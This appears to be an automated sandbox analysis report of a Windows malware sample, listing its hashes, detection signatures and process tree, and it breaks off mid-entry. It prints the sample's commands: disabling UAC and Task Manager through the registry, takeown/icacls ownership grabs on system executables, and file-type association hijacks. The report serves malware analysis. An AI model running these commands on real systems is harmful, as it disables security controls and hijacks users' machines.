Analysis
-
max time kernel
150s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2024 23:56
Static task
static1
Behavioral task
behavioral1
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win10v2004-20240802-en
General
-
Target
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
-
Size
514KB
-
MD5
65c713d83b613d647d369ed305632930
-
SHA1
eb79bea11c59b78498dbf65679ba1a24203e8d9e
-
SHA256
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
-
SHA512
26d9af89110278380c85c8193d44ac1002e4df88dfce7312402f2bd6b6e610e92559600a71068c54a17598429f55a36cc69998cb210f6ceb964d5f53f31032b5
-
SSDEEP
6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3ScNAf3:/pW2IoioS6p7q
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid Process 4560 icacls.exe 5040 icacls.exe 2528 takeown.exe 1956 takeown.exe 836 takeown.exe 5204 takeown.exe 5812 takeown.exe 4224 icacls.exe 5716 icacls.exe 4540 icacls.exe 4584 icacls.exe 4144 takeown.exe 3976 icacls.exe 5604 icacls.exe 2452 takeown.exe 4768 icacls.exe 4452 icacls.exe 3548 icacls.exe 5612 icacls.exe 2020 takeown.exe 3076 takeown.exe 3740 icacls.exe 5384 takeown.exe 5296 icacls.exe 1968 icacls.exe 3408 takeown.exe 2272 icacls.exe 3200 takeown.exe 5096 icacls.exe 1528 takeown.exe 428 takeown.exe 3420 takeown.exe 3104 icacls.exe 2264 icacls.exe 1180 icacls.exe 832 icacls.exe 5732 icacls.exe 624 icacls.exe 1356 icacls.exe 1188 icacls.exe 3384 takeown.exe 3944 icacls.exe 6124 takeown.exe 1840 icacls.exe 548 icacls.exe 1476 takeown.exe 2840 takeown.exe 1408 takeown.exe 5724 takeown.exe 5848 icacls.exe 5024 icacls.exe 5316 icacls.exe 4532 icacls.exe 3948 takeown.exe 4720 takeown.exe 2172 icacls.exe 5692 icacls.exe 6012 icacls.exe 5984 takeown.exe 2828 icacls.exe 2416 icacls.exe 1560 icacls.exe 3840 icacls.exe 3320 takeown.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid Process 1180 icacls.exe 5020 takeown.exe 4636 takeown.exe 5600 takeown.exe 1528 takeown.exe 6084 icacls.exe 2440 icacls.exe 1968 icacls.exe 624 icacls.exe 2272 icacls.exe 4552 takeown.exe 5968 takeown.exe 4404 takeown.exe 5920 takeown.exe 5388 icacls.exe 968 icacls.exe 1976 icacls.exe 5556 takeown.exe 2104 takeown.exe 3024 takeown.exe 3408 icacls.exe 3648 icacls.exe 872 icacls.exe 2652 icacls.exe 1996 takeown.exe 5848 icacls.exe 6140 icacls.exe 2836 icacls.exe 3388 icacls.exe 4568 takeown.exe 2348 takeown.exe 5292 takeown.exe 5024 icacls.exe 1432 icacls.exe 3444 takeown.exe 6012 icacls.exe 5648 takeown.exe 1356 icacls.exe 3840 icacls.exe 1184 takeown.exe 3256 takeown.exe 3008 takeown.exe 2824 icacls.exe 116 icacls.exe 836 takeown.exe 1924 icacls.exe 1188 icacls.exe 4164 takeown.exe 2476 icacls.exe 4260 takeown.exe 2612 takeown.exe 4620 icacls.exe 3740 icacls.exe 4796 icacls.exe 3320 takeown.exe 4888 takeown.exe 1860 icacls.exe 3668 takeown.exe 3944 icacls.exe 2840 takeown.exe 1688 icacls.exe 4508 icacls.exe 5040 icacls.exe 1856 icacls.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process File opened for modification C:\Windows\System32\wowreg32.exe 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 10 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid Process Token: SeDebugPrivilege 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe Token: SeTakeOwnershipPrivilege 2104 takeown.exe Token: SeTakeOwnershipPrivilege 1184 takeown.exe Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeTakeOwnershipPrivilege 4824 takeown.exe Token: SeTakeOwnershipPrivilege 3948 takeown.exe Token: SeTakeOwnershipPrivilege 3420 takeown.exe Token: SeTakeOwnershipPrivilege 3636 takeown.exe Token: SeTakeOwnershipPrivilege 3200 takeown.exe Token: SeTakeOwnershipPrivilege 3076 takeown.exe Token: SeTakeOwnershipPrivilege 1456 takeown.exe Token: SeTakeOwnershipPrivilege 2840 takeown.exe Token: SeTakeOwnershipPrivilege 1744 takeown.exe Token: SeTakeOwnershipPrivilege 2452 takeown.exe Token: SeTakeOwnershipPrivilege 2612 takeown.exe Token: SeTakeOwnershipPrivilege 4568 takeown.exe Token: SeTakeOwnershipPrivilege 1828 takeown.exe Token: SeTakeOwnershipPrivilege 2888 takeown.exe Token: SeTakeOwnershipPrivilege 1800 takeown.exe Token: SeTakeOwnershipPrivilege 4552 takeown.exe Token: SeTakeOwnershipPrivilege 4544 takeown.exe Token: SeTakeOwnershipPrivilege 2932 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exedescription pid Process procid_target PID 4432 wrote to memory of 1300 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 82 PID 4432 wrote to memory of 1300 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 82 PID 4432 wrote to memory of 920 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 84 PID 4432 wrote to memory of 920 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 84 PID 4432 wrote to memory of 2104 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 95 PID 4432 wrote to memory of 2104 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 95 PID 4432 wrote to memory of 4192 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 97 PID 4432 wrote to memory of 4192 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 97 PID 4432 wrote to memory of 1184 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 98 PID 4432 wrote to memory of 1184 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 98 PID 4432 wrote to memory of 2396 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 101 PID 4432 wrote to memory of 2396 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 101 PID 4432 wrote to memory of 900 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 103 PID 4432 wrote to memory of 900 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 103 PID 4432 wrote to memory of 1924 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 105 PID 4432 wrote to memory of 1924 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 105 PID 4432 wrote to memory of 4824 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 106 PID 4432 wrote to memory of 4824 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 106 PID 4432 wrote to memory of 2272 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 109 PID 4432 wrote to memory of 2272 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 109 PID 4432 wrote to memory of 3420 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 111 PID 4432 wrote to memory of 3420 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 111 PID 4432 wrote to memory of 1988 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 113 PID 4432 wrote to memory of 1988 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 113 PID 4432 wrote to memory of 3948 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 114 PID 4432 wrote to memory of 3948 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 114 PID 4432 wrote to memory of 5024 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 115 PID 4432 wrote to memory of 5024 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 115 PID 4432 wrote to memory of 3200 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 119 PID 4432 wrote to memory of 3200 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 119 PID 4432 wrote to memory of 3564 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 120 PID 4432 wrote to memory of 3564 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 120 PID 4432 wrote to memory of 3636 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 121 PID 4432 wrote to memory of 3636 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 121 PID 4432 wrote to memory of 3104 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 125 PID 4432 wrote to memory of 3104 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 125 PID 4432 wrote to memory of 3076 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 126 PID 4432 wrote to memory of 3076 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 126 PID 4432 wrote to memory of 1356 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 127 PID 4432 wrote to memory of 1356 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 127 PID 4432 wrote to memory of 1456 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 131 PID 4432 wrote to memory of 1456 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 131 PID 4432 wrote to memory of 3840 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 133 PID 4432 wrote to memory of 3840 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 133 PID 4432 wrote to memory of 2840 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 135 PID 4432 wrote to memory of 2840 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 135 PID 4432 wrote to memory of 3388 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 137 PID 4432 wrote to memory of 3388 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 137 PID 4432 wrote to memory of 2452 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 139 PID 4432 wrote to memory of 2452 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 139 PID 4432 wrote to memory of 4584 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 141 PID 4432 wrote to memory of 4584 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 141 PID 4432 wrote to memory of 2612 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 143 PID 4432 wrote to memory of 2612 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 143 PID 4432 wrote to memory of 1180 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 144 PID 4432 wrote to memory of 1180 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 144 PID 4432 wrote to memory of 1744 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 147 PID 4432 wrote to memory of 1744 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 147 PID 4432 wrote to memory of 2652 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 149 PID 4432 wrote to memory of 2652 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 149 PID 4432 wrote to memory of 4568 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 151 PID 4432 wrote to memory of 4568 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 151 PID 4432 wrote to memory of 2828 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 152 PID 4432 wrote to memory of 2828 4432 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe 152
Processes
-
C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:1300
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:920
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4192
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1924
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2272
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1988
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\write.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5024
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3564
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3104
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1356
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3840
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3388
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4584
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1180
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2652
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Modifies file permissions
